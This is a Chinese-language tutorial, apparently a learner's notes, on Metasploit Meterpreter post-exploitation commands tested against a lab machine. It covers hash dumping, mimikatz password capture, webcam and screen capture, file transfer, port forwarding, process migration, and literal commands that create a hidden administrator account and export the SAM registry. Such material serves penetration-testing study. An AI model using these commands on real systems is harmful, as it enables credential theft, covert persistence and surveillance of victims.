Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令。
Meterpreter命令详情
下面是一些常用的后渗透命令及实验。

基本命令:
基本命令包含Meterpreter与MSF终端,Ruby接口,目标Shell等交互命令。
- background命令
如果想在MSF终端执行其他任务,可以使用backgruond命令将MSF终端隐藏在后台。

- sessions命令
查看已经获取的会话,如果如果想与其交互使用session –i ID

- quit命令
quit命令直接关闭当前Meterpreter会话,返回MSF终端。 - shell命令
shell命令可以直接获取系统控制台shell,如果目标系统上命令可以执行程序不存在或禁止访问,那么shell命令会出错。

- irb命令
这个可以跟ruby语言交互(我没学过,暂时不会用)

- run getgui -e
开启靶机3389端口
win下 mstsc

- run hashdump
枚举账户的hash散列值

后渗透模块命令:

-
mimikatz模块
wdigest命令获取账户名账户密码

-
msv抓取密码MD5
10.
这里需要购买(没必要。。) -
webcam_list 查看靶机是否有摄像头
-
webcam_snap 打开靶机摄像头拍一张照片
-
webcam_stream 打开视频

(我这里是虚拟机就不试了。。) -
screenshot 当前桌面截图


系统命令:
-
cat命令
查看目标系统上的文件内容
(但是需要绝对路径,不能使用通配符)

-
getwd命令
Getwd命令可以获取目标机上的工作目录,相似命令有getlwd。

-
upload命令
Meterpreter的upload命令可以上传文件或者文件夹到目标机器上。
(这里跟的路径应该是c盘的web服务器目录下,然后就可以用御剑之类的连了,我这里靶机没有装web服务器所以。。)


-
download命令
download命令从目标机上下载文件或者文件夹,主语斜线与反斜线。
(后面可以接下载到的路径,不能用通配符。)

-
edit命令
使用edit命令可以调用vi编辑器,修改目标机器上的文件。


-
Search命令
搜索目标机器上的文件。
(可以使用通配符)

网络命令:
- ifconfig命令
获取目标机器的网络信息。
(因为是在后渗透界面中,所以不是ipconfig,如果在shell界面中,就是ipconfig了)

- portfwd命令
这个命令类似端口映射,重要端口会有访问限制时可以将端口连接到其他端口。


上面这条命令指将3389这个端口转发到1234端口上,用rdesktop就可以链接了。

- route命令
route命令用于显示目标主机的路由信息。

系统命令:
创建一个隐藏用户
Net user hackup$ 123 /add
Net localgroup administrators hackup$ /add
reg export HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers c:1.reg 【导出注册表】
- ps命令类似命令netstat
查看靶机上的进程信息。


- migrate命令
将会话移植到另一个比较重要的进程内存中,这样就不会应为进程被杀死而断连。
(这个就是我们meterpreter连接到靶机的进程及端口,这种很容易被杀掉或断掉)

一般可以移植到这些进程上(它们比较重要一般不会被杀掉)



-
getpid命令
获取当前会话pid。
(因为刚刚把进程移植到了2104上了,所以这里是2104)

-
sysinfo命令
用于查看目标系统信息。

- shutdown命令
关闭目标机器。
当然后渗透命令远不止这些可以自己研究研究